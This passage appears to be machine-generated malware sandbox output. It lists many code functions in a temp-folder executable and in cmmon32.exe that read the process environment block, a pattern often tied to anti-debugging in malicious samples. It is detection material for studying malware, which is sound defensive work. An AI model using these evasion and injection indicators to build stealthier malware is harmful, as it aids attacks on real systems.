          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A8C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A8C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A235A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A21DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A21DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A21DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A22581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A22581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A22581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A22581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A0D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A0D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00ABFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00ABFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00ABFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00ABFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AA8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A76DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A76DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A76DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A76DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A76DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A76DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A7A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00ABE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A24D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A24D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A24D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009FAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A33D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A73540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AA3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A17D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A746A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A8FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A216E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A076E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A38EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AAFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A236CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AAFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009FC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009FC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009FC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A28E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009FE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A0766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A07E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A07E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A07E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A07E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A07E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A07E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00ABAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00ABAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A77794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A77794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A77794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A08794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A337F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A8FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A8FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A0FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A0EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0457C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0457C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0451A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0451AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0451AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0451AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0451AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0451AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0451AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0451AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0451AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0451AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0451AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0451AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0450746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04566C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04566C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04566C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04566C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0451BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045B8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04566CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04566CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04566CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044F849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04507D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04523D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04563540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04593D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0450C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0450C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0456A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045AE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04514D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04514D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04514D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045B8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044EAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04566DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04566DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04566DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04566DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04566DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04566DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04598DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044FD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044FD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0451FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0451FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04512581 mov eax, dword ptr fs:[00000030h]
